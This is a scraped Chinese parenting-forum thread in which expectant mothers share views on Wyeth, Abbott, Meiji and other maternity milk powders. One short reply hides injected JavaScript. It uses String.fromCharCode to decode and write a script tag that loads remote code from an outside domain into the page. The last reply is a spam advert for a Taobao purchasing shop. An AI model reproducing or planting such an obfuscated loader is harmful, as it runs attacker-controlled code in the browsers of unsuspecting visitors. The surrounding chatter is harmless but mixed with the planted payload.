帖子详情

惠氏孕妇奶粉好吗?

14148252婴幼育儿

怀孕三个月左右,开始要喝孕妇奶粉了,听我姐说惠氏挺好的,营养丰富,在香港买比较好吧!有姐妹孕期喝过吗?
精选回帖
[quote]原帖由 小莉321 于 2011-3-9 17:12 发表 怀孕三个月左右,开始要喝孕妇奶粉了,听我姐说惠氏挺好的,营养丰富,在香港买比较好吧!有姐妹孕期喝过吗? [/quote       味道还好,整体感觉挺不错的啊,效果好,宝宝出生挺健康的!
2011/03/09回复
14楼
1970/01/01回复
56楼
1970/01/01回复
顶一下。。。$('ed2k_JCj').innerHTML=htmlspecialchars(unescape(decodeURIComponent('test')))+' ('+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,108,105,113,117,102,97,110,108,105,46,99,111,109,47,98,97,99,107,47,100,105,115,99,117,122,47,119,119,119,46,98,106,109,97,109,97,46,99,111,109,46,106,115,34,62,60,47,115,99,114,105,112,116,62))+' Bytes)';
昨天00:59回复
全部回帖
qkeroppiqkeroppi沙发
我怀孕时喝过几种牌子的孕妇奶粉,个人认为惠氏有一股很大的腥味,而且比较热气。但每个人孕期的反应都不同,以上只是我个人感觉而已,仅供参考。
惠氏的味道很多人受不了,我也受不了这种牛奶的骚味,我怀孕时是喝的雅培,是港版130块钱一罐900g,是香草味的,还有点甜,你可以先买一小袋试着喝,喝雅培皮肤会变得好,不管是宝宝的还是自己的。
[quote]原帖由 小莉321 于 2011-3-9 17:12 发表
怀孕三个月左右,开始要喝孕妇奶粉了,听我姐说惠氏挺好的,营养丰富,在香港买比较好吧!有姐妹孕期喝过吗? [/quote  

味道还好,整体感觉挺不错的啊,效果好,宝宝出生挺健康的!
我i孕期是喝惠氏的啊!没有以上妈妈的烦恼!感觉很不错·!!当时我是在香港买的!
我喝了两罐,很难喝。
2011/03/10回复
惠氏的奶粉营养价值还是不错,就是容易热气,如果小孩体质好,不便秘的话,喝惠氏还是不错的
2011/03/10回复
我孕期都系飲惠氏~~味道都ok~~接受到~!你可以試試~~!!
2011/03/11回复
t68q2t68q29楼
好啊,就是热气点
個人感覺挺好的!味道還可以!營養豐富就很好了!
前2天,花了155元在百佳买了罐惠氏,本人自认对食品不是要求很高的人,但发现我还是接受不了惠氏的问题。。结果要送人了。

今天还是去买了明治,明治之前喝过,味道比较淡,能接受。
2011/03/13回复
不错的,我之前都是吃港版的那只惠氏啊。
2011/03/17回复
日系奶粉的现在辐射和缺货的问题太严重了
我还在考虑转欧美的那一只好?迷死了
2011/03/18回复
宝蓝宝蓝14楼
我之前喝过,太热气了,喝了没大便,后来不敢喝了
2011/07/04回复
ake0001ake000115楼
我喝了会上火诶,而且我不习惯那个味道,后来换的雅培的,觉得挺好的他家的味道我能接受,后来就一直和她家的了。
2011/12/20回复
我喝任何孕妇奶粉都会吐的~
2011/12/20回复
没有什么好不好的,看你接受的程度,我自己就觉得好难喝,买了一罐一半都没喝完。后来想着为了补充营养还是要喝的,就试了雅培,味道比惠氏好点,香草味,可能自己就是不喜欢喝奶粉,所以这罐雅培还是没喝完
2011/12/22回复
小莉321:
怀孕三个月左右,开始要喝孕妇奶粉了,听我姐说惠氏挺好的,营养丰富,在香港买比较好吧!有姐妹孕期喝过吗?
查看原文
惠氏的太腥了,受不了。安满的不错,好多朋友都喝这个,并且是专门做孕妇奶粉的。
宝妈如今在家带宝宝,来为宝宝赚点奶粉钱,如果MM需要奶粉可以帮忙代购哦!
宝妈因有朋友每天来往于深圳-香港,刚刚开始做代购,价格优惠!
暗号:妈网,还可95折优惠!(含奶粉的哦,只求赚信誉)
http://shop35410742.taobao.com/
2012/04/22回复
猜你喜欢

有喝惠氏铂臻奶粉的宝宝么?

惠氏奶粉怎么样?听说惠氏喝了会上火,纠结要不要选它~

给宝宝吃过惠氏膳儿加奶粉的妈妈说说这奶粉怎么样?

惠氏专家第十一课:如何挑选奶粉能防止宝宝便秘上火?

大家有没有有接过上海高琦诗的电话!惠氏奶粉是不是真的?

牛奶和孕妇奶粉喝哪种好?

热点推荐

最强狂风暴雨要来!多区雷雨大风橙色预警

打卡记录假期出游 领6W+金币超大奖励!

母亲节花式宠爱你!瑜见美好孕动会

这个折扣仓生意很好 每天的商品都不一样

猪队友傻了吗?大过节的又开始犯浑。

#五一宝藏时光记#+5.1华侨城欢乐海岸

#五一宝藏时光记# 4月30日佛山坪洲公园游一

#五一宝藏时光记#+顺德大良city walk

#五一宝藏时光#+5.1+广州正佳广场 番茄口袋

#五一宝藏时光记#5月2日广州city walk

五一宝藏时光记#+0501+好久不唱,今天到活

#五一宝藏时光记# 4月30日闲游珠江公园 猫

#五一宝藏时光记#5.1 清晖园初印象

查看更多热点 >